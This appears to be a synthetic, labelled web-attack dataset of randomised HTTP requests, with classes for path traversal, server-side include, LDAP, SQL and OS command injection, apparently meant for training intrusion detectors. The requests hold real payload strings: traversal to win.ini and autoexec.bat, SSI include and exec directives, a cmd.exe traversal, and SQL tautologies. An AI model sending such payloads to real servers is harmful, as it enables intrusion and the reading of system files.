GET /fBzKwT/cZaz.Wodopto/c6FJ5qrttNnsSCpl/0arofatd/ldj@@KPrw2t.gGM/moHi1/v@varcgV.bin?ctt=149&imeEf9n=33&huRdT9u=63069&lD3xWF=7&0a@iframemhaving7UCFlinki5=mocha%3B9yScS&l9haheNe5utnpeN=t%26&eniae=%2FifflweaYaf&r1zeenrsrsa=turv HTTP/1.1
Host: 24.27.147.61
Connection: close
Accept: audio/x-wav, text/*
Accept-Charset: koi8;q=0.8, x-mac-hebrew, iso-2022-jp, x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 90.202.217.200
Cookie: lyeaoenrS=wcw2AOUZ1c;ineiiroinueom=<!--#email fromhost="www.mi6rpbe.com" tohost="mailbox.reja.com" message="Vheo yelmr8a tozia fQ5" fromaddress="nowsb.com" toaddress="ira.t9o.com" subject="ae0" sender="vlte.com" replyto="ftutc.com" cc="es" inreplyto="tdnew nlsl A" id="Frmail" -->;aa=uf4l5H1tcEN8;ra=pefwMexd8dlr18;2Tvar9Vshutdownp.D330a=Enmzoo7sr
Cookie2: $Version="7"
Date: Fri, 06 Jun 08 07:13:48 UTC
ETag: "27uvsJ.8@S2QA1NSd"
Expect: 5rrdSb
From: ectdj@6rt19rcai.com
If-Modified-Since: Tue, 17 Mar 09 20:25:59 UTC
If-Unmodified-Since: Mon, 03 Dec 07 02:35:52 UTC
If-Match: "aydBBOQ@X6bWt.6n"
If-None-Match: *
If-Range: "eeugd6Yb6zJ01eue4AC"
Max-Forwards: 972
Pragma: n6='Bae'
Proxy-Authorization: 0vsnrs eehysnd=1fiFjer
Authorization: Digest qop=auth
Range: 223672-,810-
Referer: /laeuGh/rogHh4oy/smt1f1s/hdbt/rmonta.asmx
TE: trailers,trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/4.4 (Windows; U; WinNT 6.6; re-gm; rv:1.7.2) Gecko/44503422
UA-CPU: x86
UA-Disp: 016,7068,8
UA-OS: Solaris
UA-Pixels: 308x434
Via: 8.0 www.zsSqO.gif:582
Transfer-Encoding: compress
Upgrade: eeey/9.3
Warning: 430 218.56.203.53 "ebsaieatngcc1Ede" 
X-Forwarded-For: 83.220.235.130
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39151
Start - Id: 45561
class: PathTransversal
GET /1ztOiau37edfrrafOs/andvhZfGzY.nsf?udtirytts1Rnpp4=41690580&Vm3-jAJuCe=4b&msi4rvebe8t=disse7aqkl0do&tIxYVzg3f=di8Pte&trs5=l+dene0gfc+noesC9zi&WloAoKalixoo=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.1
Host: www.pdiH.org:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 164.135.230.128
Cookie: -wgetuY2AsyN=j >((yh7shnwe;4ZZIoptBl7=ecdresinsertda9s|;jtjodU=]tecsnbm;sndaet3arTSEuJ=3;wmlstgtrdit=sXm84z;nnw6puA=83575925
Cookie2: $Version="73"
Date: Mon, 16 Feb 04 02:34:51 GMT
ETag: W/"ElVO6V06XBJ0jAyMvxr"
Expect: 100-continue
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: "1-eM-vC.MigzzBmh"
If-Range: Tue, 10 Nov 09 23:51:34 GMT
Max-Forwards: 7069
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: 0391-
Referer: http://nyaxdire.biz/etaiw/kaep6nor/tan9at/eaqxpf/exleano.tiff
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.2 (compatible; ttdnoo; SunOS sun4u; mebnsuh)
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: HTTP/8.0 155.18.101.99, 6.7 www.vn1at4ir.css, 5.1 208.168.129.29:3
Transfer-Encoding: deflate
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45561
Start - Id: 39237
class: SSI
GET /wqt3c5s.Mz/1_p1QbmLrBJ6XBzv/SwDhlue.cgi?cHsuijz=s2XWRw-ARUX&Ssi0ttsCEso=108975&tsOn04JuL=266467&aldoii=pUs&Tr7l6lrnqm=94951099&oen6=5041&as9e=o%24o&efor2o=9807413&lhlrgie=s&eUkiIlewla=f%7Eyappassthrun%7EpZ&dtoa=-iwilocation4+eoet&labHiht=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: www.Ec5l.be:7713
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: ynx='utvsuitz'
Client-ip: 138.41.1.241
Cookie: aspaqs7lOloevmo=qre7estat;aiJ11=3Q_O@fZ
Cookie2: $Version="350"
Date: Fri, 05 Oct 07 17:33:23 CET
ETag: "4WITdI0tQXVWOMUbkat"
Expect: 7a2s1
From: saxeqIt@wdataw7.be
If-Modified-Since: Sun, 06 Sep 09 23:29:26 CET
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: "Ax_Hwmw7aTiwjzh"
If-None-Match: "wml3rpssJgg0@3Jdoslc"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 2
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: Digest realm
Range: 5-9725,-6683
Referer: http://sDaLe.be/iitAe.mpg
TE: gzip
Trailer: Date
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 9.4; mn-em; rv:1.0.1) Gecko/63911405
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: A2e/2.1 190.100.23.126
Transfer-Encoding: deflate
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 175 www.EcrdzMao.htm "sneuerge0ah1so" 
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 70848217274143
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 39237
Start - Id: 38498
class: LdapInjection
GET /Eteoneiatband.mspx?olrbtd=hrvoxnct&Irh=9&kleHb=st%29%28%26%28objectClass+%3D++++er*%29&MMGvhN=nPLDZOgK4iCx&U5Zuh@Jr=57446407&dm1r=30156017&sciteqda=link%3C8%40&srniOoshmrnsi=iOG5P.N&hr7ugtnafe3Ir=carKlLO&esev=emqpndbak HTTP/1.0
Host: 25.73.144.48
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: sjsmaFe1-uasmw;q=0.8, syjoE-eGoiei
Cache-Control: max-age=569
Client-ip: 13.141.85.224
Cookie: yg8tT6h=65;_8RnH=eftas<cSopensehrsetc;3toh=rgEyx2;weerccTgsan568t=tstaee0ettt8iit;snH7h=@g|madmiouit8 shutdownr2;-q9B3=8P3y=a\vpositionagroup byohAr]all@5
Cookie2: $Version="61"
Date: Sun, 02 May 04 12:07:10 CET
ETag: "J-fv2rP2MOgclBTG"
Expect: rae1
From: eorT@elrAedmeoy.biz
If-Modified-Since: Sun, 24 Feb 08 07:33:57 UTC
If-Unmodified-Since: Tue, 31 Jul 07 16:58:38 CET
If-Match: "bz@knryATjbiGzE-WFM"
If-None-Match: "O_Y@lMwjEDIcLyO.5g"
If-Range: *
Max-Forwards: 6752
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: 0tief oahyns70=nt5tteei
Range: 108364-
Referer: http://sThh.be/liheeIl/ameftsSy.dll
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: petyc7quZ/1.7.6.5.9
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9397x4761
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: identity
Upgrade: hiE/0.7, ube/1.1
Warning: 955 www.0jeun.css "MnohqAoa9er1renYsg6u" "Wed, 21 Sep 05 20:55:25 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38498
Start - Id: 45100
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: 0.101.198.241:80
Connection: close
Accept: application/rtf, text/html;q=0.9, audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: a-p9vlhr;q=0.6, mCmh-uaonk4
Cache-Control: no-cache
Client-ip: 229.13.49.114
Cookie: sedtph=3
Cookie2: $Version="8"
Date: Sun, 18 Feb 07 16:24:22 UTC
ETag: "NeIswK_7a5EBHO2LNI"
Expect: eLdfnttl
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Sun, 21 Mar 04 21:14:23 UTC
If-Unmodified-Since: Tue, 18 Mar 08 17:40:36 UTC
If-Match: "@qTsqfeb1mDFCco"
If-None-Match: "UTO0q3VBxUsrOf0."
If-Range: "s@O51GsxN2Uie9S"
Max-Forwards: 2
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Basic T2UzdHNiZUw6ZXN2NnVT
Range: -3,456-488022
Referer: http://www.p8ie3r.gov/h4aahb/ahlhsya.avi
TE: gzip;q=0.6,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.9 (compatible; MSIE 3.6; Linux i586; oboIrgcpU)
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.0 91.186.196.32
Transfer-Encoding: gzip
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45100
Start - Id: 40425
class: SSI
POST /oH/Jescript/nKNAb_pd1TNa7/n2jYEhI9LGv.8UaP.sh? HTTP/1.1
Content-Length: 323
Content-Language: R5oNjc
Content-Encoding: deflate
Content-MD5: bnNrU2NpZXNqcmFPdGVubg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Sep 05 11:40:39 GMT
Host: www.lchlzhsner.it
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-age=2495
Date: Tue, 09 May 06 24:37:30 UTC
Expect: 100-continue
If-Unmodified-Since: Sun, 16 Jul 06 03:19:31 UTC
If-Match: *
If-Range: *
Max-Forwards: 812
Pragma: no-cache
Authorization: NTLM NWV1c2U0dDJhbzFpb2VuaWEyc24ydzR0T0h4YTBtc2RpTGg=
Referer: /l0etkr0i/irahs/arhe1/wjlr.pdf
User-Agent: Mozilla/9.4 (X11; U; Unix 4.2; er-ve; rv:6.9.0) Gecko/68068748
Via: HTTP/6.6 142.47.250.210, 1.5 80.222.31.116, 1.8 189.211.54.57
Transfer-Encoding: identity
X-Forwarded-For: 55.189.138.51

wisilfgtnroN=5&er1ess=62128&mme50elirlms=9reeEb%a7rEa&0et8aoptkar7=06&rnia8wccoOeylo=soe&kCueujEey1aglhf=fFY&oRe=mehl4tluh&j9nnyort7t=ibet&eadofllyai=rAl3dA&u0ya2ecbnaTohi=e divNa&mnbdcdEa4a9=515&sNwe8Ns1Eoe=<!--     #include     virtual="d:\windows\autoexec.bat"     -->&rdsyo0t=sd6m:ibt&ooe=643309

End - Id: 40425
Start - Id: 40912
class: SSI
GET /n_WYXUeoaWF96NE5yJ/ujwRn/hCPiLbpUlG/TkIwunion/BXtvWHpcopynV/aE3ePpm988I2PjQ.gif?ai=f%28%28e+OlL4o%24&lenurE9sg=E5zd&ew6eedetCnTrtT=sA7&B2VQ1FTNp=86718&ua8tYeieowaho7=oBh&oCulLi=%3C%21--++%23odbc++++connect%3D%226sge%2Chpte%2CpmLC%22++++++statement%3D%22select+*++++from++++mu%22--%3E&lsfoaycnCR=uei HTTP/1.0
Host: www.hadaefsnts.com
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.9, windows-1253
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 107.204.228.141
Cookie: 5NxwtSwvresd=hir;oyTo5rcoEegSiet=aasaelhA3hQn;uebuebsNtu7s=MtW3from;ml9=eeteten
Cookie2: $Version="3"
Date: Fri, 31 Mar 06 04:45:15 GMT
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: 100-continue
From: 7tnz7e@rrkue5aod.it
If-Modified-Since: Wed, 20 Jul 05 09:15:09 CET
If-Unmodified-Since: Tue, 25 Oct 05 17:11:15 CET
If-Match: *
If-None-Match: "XstJE9ZCTYnVm_eI"
If-Range: *
Max-Forwards: 39
MIME-Version: 7.3
Pragma: rdtrc='tnsz'
Authorization: NTLM ajlpaENFYU9iZTB0bmFZYmVoeWlhb2ZCbzJmbnRyaTVteGw2b3JyNW1yQXBsbjg=
Range: 518194-7
Referer: http://nieai.ch/tqedn.bin
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.7 (X11; U; Linux i586 4.1; re-la; rv:6.1.5) Gecko/18315848
UA-CPU: MIPS
UA-OS: Windows 95
UA-Color: color32
Via: 9.3 www.reeFohso.htm, 5.5 202.245.151.136:220
Transfer-Encoding: gzip
Upgrade: anfp/6.9, eecan/9.5, 4qnw/7.1, daim0/3.8
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 175.203.115.62
X-Serial-Number: 163741114628927
----: ------------------

null

End - Id: 40912
Start - Id: 39546
class: SSI
POST /exmHN/oanDd.css? HTTP/1.1
Content-Length: 116
Content-Language: tlne
Content-Encoding: compress
Content-Location: http://www.pcpax.gov/Demxqofq/a3ry/7dcei/nyiuHy/cssmQi.asmx
Content-MD5: bzl0c0R0ZWloY2VlZkZsYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Jul 09 09:52:06 UTC
Last-Modified: Thu, 21 Sep 06 14:17:28 GMT
Host: 229.202.103.187:848
Connection: keep-alive
Accept: application/postscript;q=0.6, application/rtf;q=0.7
Accept-Charset: windows-1250;q=0.2, x-mac-cyrillic;q=0.9, big5;q=0.9, ks_c_5601-1987;q=0.5, x-mac-icelandic;q=0.2
Accept-Encoding: compress, gzip, deflate;q=0.3, deflate;q=0.3
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 94.165.84.44
Cookie: f5eorjti=koz8;slTue=eyaohea;WA2BFJD@3vz=c8jhh;avgo4cjt1ecnsna= eprolinh?oa
Cookie2: $Version="21"
Date: Thu, 02 Aug 07 21:20:42 GMT
ETag: W/".iU6eDHRsrc-@9hLMty"
Expect: tkvh
From: nsnhcot@wollyC.st
If-Modified-Since: Tue, 27 Jan 09 12:01:10 UTC
If-Unmodified-Since: Tue, 28 Dec 04 19:24:25 CET
If-Match: "@zy.mKCE-5ORFJEI1Ve"
If-None-Match: "Wo2ebZMJidzslMq"
If-Range: "3Z7-3ynm7.5r@1hq"
Max-Forwards: 41
MIME-Version: 1.1
Proxy-Authorization: tennta dsi10Hd=atah9ert
Authorization: NTLM bmFIY25hb2hocHk1dHdvb3RlcHBlbnVlb0xIbHFlY2U=
Referer: http://www.bOazlga.biz/rSon/m8heL/i5myjtk/enyH0a/seusndeD.mpg
TE: trailers,gzip;q=0.9
Trailer: Expect
User-Agent: Mozilla/3.5 (X11; U; Linux i386 2.6; ph-Ed; rv:6.4.3) Gecko/41481020
UA-Disp: 0663,736,8
UA-OS: Windows 95
UA-Color: color32
Via: 0.1 188.33.138.116, aAhnt/8.1 www.ghtkoerG.jpg
Transfer-Encoding: compress
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 543 www.ydocee8.html "biTseoerdCyyr4oaht" 
X-Serial-Number: 11507528452920010282
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bmoida=lePZ&amIbertc=eyfCeDcZo&pttec=<!--     #include     virtual="/etc/httpd/httpd.conf"   -->

End - Id: 39546
Start - Id: 44207
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 67.41.156.207:80
Connection: close
Accept: application/*, video/mpeg;q=0.3, image/png
Accept-Charset: utf-7;q=0.6, x-mac-icelandic;q=0.2, utf-7;q=0.6, us-ascii, euc-jp
Accept-Encoding: *
Accept-Language: wc-o;q=0.2, bomtneh-e;q=0.6, edhe-an;q=0.4
Cache-Control: min-fresh=668
Client-ip: 99.103.6.37
Cookie: nhieaBhbakot=cxho|;mItmpDhtacces=2187;aeelooio=iXDkJy@bVC;aWcidPt='betkDir+o;ov=yieg;CJHFJ=olRA5Cp9k
Cookie2: $Version="370"
Date: Wed, 01 Nov 06 11:21:04 UTC
ETag: "wFfcy3k9UPL1p_h.3m"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sun, 26 Nov 06 05:28:15 CET
If-Unmodified-Since: Wed, 16 Mar 05 17:13:38 CET
If-Match: *
If-None-Match: *
If-Range: "d@c@y9vnj9R@FcJY-V"
Max-Forwards: 7
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: 9w0nEe Hqmzed=bebg
Range: 808-
Referer: /bcaAn/uTIroAnh/7Csp/eetloats.png
TE: gzip,trailers,chunked;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/6.5 (Windows; U; Windows NT 0.8; nm-ui; rv:7.9.9) Gecko/88494462
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 953x6132
Via: HTTP/8.7 www.1Tto1o.css:96155
Transfer-Encoding: identity
Upgrade: eEEr/2.5, y9ejm/8.5, Nwaeld/9.4, tc4/7.0
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44207
Start - Id: 37599
class: LdapInjection
POST /.homemocha0IAFlKKchYN/em/o36CryUmw6QwbfYreF3_/O@18@cjxPzdF/Euode5neohy/escko/xehl8tam8eos5txgkia.php3? HTTP/1.0
Content-Length: 104
Content-Language: AFIsz,fio
Content-Encoding: compress
Content-Location: http://aaqtloap.de/TObsAfR6/2sgE/oSeTfs6/psrod.nsf
Content-MD5: ZXR1Z2Rpb1RwZHpzZ2lkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 15:41:05 UTC
Last-Modified: Wed, 28 Nov 07 24:19:54 CET
Host: www.dooLn.org:12067
Connection: close
Accept: image/*;q=0.7, application/x-tar, text/html
Accept-Charset: *
Accept-Encoding: gzip, identity
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 99.181.231.1
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="2"
Date: Fri, 21 Jan 05 03:44:12 GMT
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: atns@eiaaaj.fr
If-Modified-Since: Sat, 18 Jun 05 21:43:58 GMT
If-Unmodified-Since: Sun, 02 Dec 07 11:15:13 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 21
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: Basic d2FvaDpuaHFTb3NkYQ==
Range: 2-4,-9680
Referer: /atErvtdr.wav
TE: chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.8 (Windows; U; WinNT 0.5; ah-ns; rv:0.3.8) Gecko/85208043
UA-CPU: PowerPC
UA-Disp: 752,1342,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: 2.2 201.112.45.110
Transfer-Encoding: deflate
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 105.35.228.101
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ea=7337189&4tmleqgh=1800581&positioncTUNmbw=o&surSuaIi=)    (|  (9ie=nyra*)&aswCesniit=+qh

End - Id: 37599
Start - Id: 41937
class: SqlInjection
GET /oY3yn/uhfhavsdtnie/rUT/f@M9.png?7Nbtrhukshsceu=h%24phpidrop+nr&IRrwinntFoEdC=dkuvSdaSrfr&tfir1H8uc=letui%26ne%5D+&WZXPBsVGJeR2=8369955&HmsaeO=4488510334&IfmCD3Cq=sb0%40&i-Sx5=+++++OR++++2+%3E+1&pygrwieusdtl2=astmhtoqromqm+&9g2bdq=a&tdmtt=l+m&atwapoiyohtje=7&eseBAtd=705&I4eltogog=237500&y2cnlHq=47 HTTP/1.1
Host: www.Rwr1n.com
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 148.203.206.38
Cookie: biar3=190503;xte5vtlsgSrsne=8
Cookie2: $Version="049"
Date: Tue, 13 Dec 05 07:57:19 GMT
ETag: "yqI8BVet6kNEav5Q"
Expect: yrnr=0aorOe
From: m9He0on@mdltezsc.org
If-Modified-Since: Mon, 20 Jul 09 16:42:05 GMT
If-Unmodified-Since: Thu, 29 Apr 10 13:26:41 UTC
If-Match: "h1xAaJiYOZdWVdq"
If-None-Match: *
If-Range: Thu, 08 Jun 06 19:55:45 UTC
Max-Forwards: 0881
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM aWpBVDRyVWhiaUFpZW5lZkltd3ROSHd1cjFpYXp0cmV5MGxtQWFwY2Jnb3I=
Authorization: eluul setao=rr7y
Range: 230210-,74601-,-666
Referer: http://aawq.net/nowbrnr/uImiel.sh
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.4 (X11; U; Unix 8.4; ip-Od; rv:1.0.4) Gecko/02150050
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 724x022
Via: HTTP/0.0 www.5sox.gif, 2.4 www.Caatteoe.css, a3TzXn/1.1 www.ircr.jpg:7
Transfer-Encoding: deflate
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 985 75.9.47.68 "9pnu" "Mon, 31 May 04 18:02:50 CET"
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41937
Start - Id: 42182
class: SqlInjection
GET /r-/tA6e-9p2WTj/ff52Q.dll?a2n=757&leymsrost=rwnIUj&rb=9726702&e64ujfhe0nd=272921&AtuEp=710531&leSynT=f+miu+&wsP=or+++0%3C%3E%28select++count%28*%29+++++from+++0s%29 HTTP/1.0
Host: 155.71.213.218:80
Connection: atx4
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ere-e;q=0.1, cl6sq-hc8;q=0.3, a7xsjade-si;q=0.8, h8oy-uol
Cache-Control: max-stale
Client-ip: 171.126.113.10
Cookie: nYxgXoK=guL-jA;neE=89021;m3Achwmbrio=03663;sestt54ti=lrhsit)a1aDswE sa05r;clesbe=oa9shguci
Cookie2: $Version="16"
Date: Wed, 06 Sep 06 20:57:28 CET
ETag: "VKFBYpcbywJ_iX8q6h."
Expect: 9fto=lKrtw;ieBn=ntteqL
From: tnetRvi@fedacee.com
If-Modified-Since: Sun, 22 May 05 22:08:11 UTC
If-Unmodified-Since: Sun, 19 Mar 06 01:42:23 UTC
If-Match: "0QUaAY9PTPx.rFLEA6"
If-None-Match: "tjFvIU@i0xY0kLmb5TIW"
If-Range: Tue, 28 Jun 05 23:32:10 GMT
Max-Forwards: 049
MIME-Version: 5.3
Pragma: ULst=nh
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: tttnT asArsom=lnlse
Range: 1010-
Referer: /saR8Et/dthh/Eo2Cgst/amqoPpe/2neey.doc
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: ihzrye5ot3vunisli
UA-CPU: PowerPC
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: compress
Upgrade: iys/4.6, S1i/2.8, sci/5.5
Warning: 077 59.191.158.127 "ei9sntzrrroetttt9" "Sun, 13 May 07 16:46:00 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42182
Start - Id: 38721
class: LdapInjection
GET /o-OCk@Mvh7G2.asp?zwhereR5zgs=edRi9vak&aTqycNxl.aR=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&zhssEbi3i1bi=uDoo7h74n&lulr5epotmtVho=gzC&hdOeaeit3ssTig=6551&rcJE=fbetweentsdipJtixsbd&VO1catxdiv28i=jIaTlze&oa.R3Sh=pincb+o%3Bpd5&0eonish=axetjlfewmmehuldi&tvotoquohaA=593881&ueiasusyoTr8e=6260649 HTTP/1.0
Host: 75.245.84.87
Connection: keep-alive
Accept: video/*
Accept-Charset: x-mac-chinesesimp;q=0.8, x-mac-chinesesimp;q=0.3, euc-kr;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 38.118.36.252
Cookie: vlikeiPu8XJ=7uSjuWd.;pmfOls0LT7=1esJ8w;8nh=q
Cookie2: $Version="8"
Date: Sat, 19 Nov 05 04:06:21 CET
ETag: "A48RBMO2ubP-JQ_buI"
Expect: dv2os
From: ilrb@h5ihiwr.cz
If-Modified-Since: Mon, 29 Nov 04 22:22:39 GMT
If-Unmodified-Since: Tue, 22 Sep 09 17:56:10 GMT
If-Match: "AEFRn_BfxVQKRWtDbZI"
If-None-Match: "QgEgtKeq5TWfv86vD5Lk"
If-Range: *
Max-Forwards: 94
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=pssp
Authorization: Digest realm
Range: 5873-
Referer: http://www.cght5i.uk/3sem5li.zip
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/4.9 (Machintosh; U; Mac OS X 0.5; di-He; rv:4.3.4) Gecko/73170508
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 094x3377
Via: 4.6 230.120.78.53:42, 7.6 www.dgOoca3e.jpg:193
Transfer-Encoding: cekyl; 8adrceE=yyzp
Upgrade: ei1/2.0
Warning: 792 57.164.145.223:2 "o6u6iwaenei" "Thu, 08 Oct 09 12:11:05 UTC"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 89253590
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38721
Start - Id: 39957
class: SSI
GET /eCQ8qgzQObcD1hi2/iZQNvWAJL9Ynwy.4YF/eMawra8tikinnn/2nPMjUeW3/6JUTBi/nu88JTXbi/rVYq6CDkSFo3GX/etkwvltpGcn/nIvBRmXFgr/eiteurmUnaenntk/cdaad/xhHv.u2OiCw_5ulDV.php4?NgdeOZo6jp3did=89&nuG=rU%40&p24GmochaIn1K-=%3C%21--++%23exec+++cmd%3D%22%2Fbin%2Fls+++-l++%2Fhome%2FiosMdoe6an%2Fjgucor%22+--%3E HTTP/1.0
Host: 80.146.236.99
Connection: close
Accept: */*
Accept-Charset: windows-1255
Accept-Encoding: compress, gzip
Accept-Language: tUlYea-o, sh-atmc;q=0.0, i-p;q=0.2, Ca2aotot-rjoray2;q=0.8
Cache-Control: min-fresh=313
Client-ip: 225.57.174.238
Cookie: hMePghi=s8Roj1o7imgohc]
Cookie2: $Version="86"
Date: Wed, 06 Oct 04 10:08:57 CET
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 100-continue
From: so7e5@hesdawuna.uk
If-Modified-Since: Wed, 01 Jul 09 08:18:01 UTC
If-Unmodified-Since: Sat, 23 Apr 05 10:12:27 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 09 Mar 06 16:37:59 CET
Max-Forwards: 93
Pragma: no-cache
